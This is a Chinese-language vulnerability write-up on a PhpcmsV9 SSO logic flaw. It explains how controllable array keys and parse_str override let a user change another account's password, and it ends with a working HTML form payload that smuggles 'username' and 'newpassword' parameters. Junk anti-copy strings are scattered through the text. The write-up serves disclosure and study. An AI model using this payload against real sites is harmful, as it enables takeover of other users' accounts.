PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：

- ?1 l5 p6 Z* s+ ^; H: ~: c
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
& y# c5 p- z/ s9 M' W, x- `
' p; Z- h$ P1 ^" k9 ^, c9 f+ z在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。

9 Q. z% J; ]$ F5 F7 K$ s8 v3 `& W我把它留给了你们。
/ c% V( |, I6 N( F不知道你们发现了它没有。
6 w4 v  C3 ^! \: C- C" e: o" R
我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。
- d% Y1 o' o2 f' z( Q
# C( A/ |: x7 G+ f! I- ?所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。

也就是

username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。

要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。
  Y" `& n4 a( I2 F( ?  y
* j2 g+ ?" R, J( D/ L" N; `. k
其实我们有这样的机会，看看代码，如下：
, w) l3 Q2 n5 b+ L4 y
/ |- m* m' J/ G
public function auth_data($data) {
. ]# g1 D" f, N% e                $s = $sep = '';
                foreach($data as $k => $v) {
                        if(is_array($v)) {
                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
: f" f0 ^, \8 X6 _6 |) z! u                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
' T6 c; u- @. k" y% \3 c                                        $sep2 = '&';
: K$ k& u7 H  q* K                                }
  j% H  O8 f, t& b+ f4 q                                $s .= $sep.$s2;
                        } else {
                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
! h3 ^- U' O- f% ~2 v8 N5 G                        }
: U* G* G: ^9 y  `8 Q5 \                        $sep = '&';
' i' v( u# h8 h% t" V, m  b$ J7 K9 f; g                }
4 ^, f* A& v9 k+ a  @* ]
$ D4 {: w6 c' o& V$ z7 h3 t* v                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
                return $auth_s;
8 ^/ J) V' S8 j9 i$ i1 X        }

% Q: I& B6 T: `* L# M1 s可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。

- A' v- M- r$ A- R举个例子
; k: n, d; I: ~% Q& W- P
$a[aaa=a&bbb] = 'a';

/ I' Y( q4 N% r! a会变成aaa=a&bbb=a

明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

这个时候，我们可以再去看一个函数。
7 c9 K) ?& e, V( X# f% c
就在这个文件内：

( J2 A- Y* i, p, s4 M2 O$ y0 l
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
                if($email && !$this->_is_email($email)) {
                        return -4;
* `& f  q, v' b, Q# b3 d1 L6 K% |                }
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }
: O8 n. O) a; K3 X- S
这是向通行证发了这样一个请求。

我们再跟到通信证代码里去看看，就会有所发现。

1 p# |2 r+ K6 N* r% ^
+ J8 e/ Z! r' z& xpublic function edit() {
//能省就省，太长了不是吗？
" \6 K! F* P- z; v* R  ?
* O% {2 r/ x3 u* R6 ^6 Oif($this->username) {
( v/ d* J1 X7 j" d+ R! P//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
0 G" \. F4 B& p9 I, ^3 {; I                                $res = $this->db->update($data, array('username'=>$this->username));
) n0 Y& W6 \+ i: h) r% b6 F/ ?                        } else {
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
3 U6 |$ D/ T3 K/ t+ o2 C7 u/ `1 C6 r                                $res = $this->db->update($data, array('uid'=>$this->uid));
                        }

* p) D( `6 y( b9 {/ e  W好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：
3 s1 z, U# A, h$ H$ H
9 R) }1 G0 |4 U) Gpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')

9 w% E6 C- K! e* S+ s: p" p很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。
# i  @5 o9 w* k4 {1 n9 `* h
' k- L/ ?0 c: X. Y我当然找到了：
phpcms9/phpcms/modules/member/index.php
- W( t, l$ |4 ~0 u" f; d
- I9 V5 P9 j" L; t$ B% C$ q1 ^2 Q$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);

! q: e) M- b* l0 o然后就没有然后了。

( c& V( Z7 l& a  F<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
. s2 C( f+ }  v; i                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
                                                <th width="80">邮箱：</th>        
, U: K( [( A7 B5 ]% ~3 O                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
, z* L/ b4 G$ ^2 q6 ~/ ^                                        </tr>
4 [2 t5 j% q, I                                        <tr>
2 o9 y' U0 \/ P8 v8 U  q+ [- |                                                <th width="80">原密码：</th>        
5 O; q( E' [0 T# H9 s1 u$ W                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
2 Q" d/ \. N. D. @: B. i                                        </tr>
                                        <tr>
                                                <th>新密码：</th>
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
9 V# R; [& O7 f5 |                                        </tr>
4 R0 a5 z! d1 ?: ?: s" ?                                        <th></th>
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
                                        </tr>
                                </table>
6 @' A, \, r# j
                               
; z% Y3 v+ g8 V3 @                        </form>